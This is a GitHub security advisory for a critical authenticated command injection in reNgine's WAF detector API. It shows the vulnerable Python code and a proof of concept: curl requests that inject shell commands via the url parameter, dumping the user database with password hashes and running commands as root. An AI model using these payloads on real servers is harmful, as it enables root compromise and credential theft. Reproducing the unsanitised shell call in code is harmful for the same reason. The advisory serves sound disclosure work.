Skip to content

Authenticated command injection in WAF detection tool

Critical
yogeshojha published GHSA-fx7f-f735-vgh4 Jul 23, 2024

Package

reNgine

Affected versions

>= 1.2.0

Patched versions

2.1.2

Description

Summary

An authenticated command injection vulnerability in the WAF detection tool allows an authenticated attacker to remotely execute arbitrary commands as root user.

Details

The URL query parameter url is passed to subprocess.check_output without any sanitization, resulting in a command injection vulnerability.

rengine/web/api/views.py

Lines 268 to 275 in 53d9f50

url= req.query_params.get('url')
response = {}
response['status'] = False
wafw00f_command = f'wafw00f {url}'
output = subprocess.check_output(wafw00f_command, shell=True)
# use regex to get the waf
regex = "behind \\\\x1b\[1;96m(.*)\\\\x1b"

This API endpoint is accessible by authenticated users with any use role. Because the process runs as root, an attacker has root access.
In order to capture the command output an attacker needs to wrap the actual command to be executed in e.g. in printf "behind \e[1;96m$(COMMAND HERE)\e[0m" to make the RegEx match.

The vulnerable code has been first released in reNgine 1.2.0 (May 29, 2022, 3d5f172).

PoC

  1. Setup reNgine as usual and create a user
  2. Log in as any user
  3. Run or open the following examples (adjust sessionid accordingly)
    1. Run python3 manage.py dumpdata to dump all Djano data, including users and passwords
    curl -k 'https://localhost/api/tools/waf_detector/?format=json&url=;printf%20%22behind%20%5Ce%5B1;96m$(python3%20manage.py%20dumpdata)%5Ce%5B0m%22' -H 'Cookie: sessionid=uioph56ozaauu6836h4h5mmliqcvp5xc'
{"status":true,"results":"           _   _       _\\n          | \\\\ | |     (_)\\n  _ __ ___|  \\\\| | __ _ _ _ __   ___\\n | \\'__/ _ \\\\ . ` |/ _` | | \\'_ \\\\ / _ \\\\\\n | | |  __/ |\\\\  | (_| | | | | |  __/\\n |_|  \\\\___|_| \\\\_|\\\\__, |_|_| |_|\\\\___| v2.1.1\\n                  __/ |\\n                 |___/\\n\\n[{\"model\": \"auth.permission\"[...snip...]\"fields\": {\"password\": \"pbkdf2_sha256$260000$UPfSQ8dyrRcAcDKaCfvwcz$8x5ssagj5bmvSqtpgd6BMukSgmHNZepEf8uPS2Lalv0=\", \"last_login\": \"2024-07-22T23:10:06.233Z\", \"is_superuser\": true, \"username\": \"root\",[...snip...]
    1. Run echo "Hello from $(whoami)@$(hostname) to print current user and hostname
    curl -k 'https://localhost/api/tools/waf_detector/?format=json&url=;printf%20%22behind%20%5Ce%5B1;96m$(echo%20%22Hello%20from%20$(whoami)@$(hostname)%22)%5Ce%5B0m%22' -H 'Cookie: sessionid=uioph56ozaauu6836h4h5mmliqcvp5xc'
{"status":true,"results":"Hello from root@e70b3c80d85a"}

Impact

This vulnerability allows an authenticated attacker to execute arbitrary commands.

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE ID

CVE-2023-50094

Weaknesses

Credits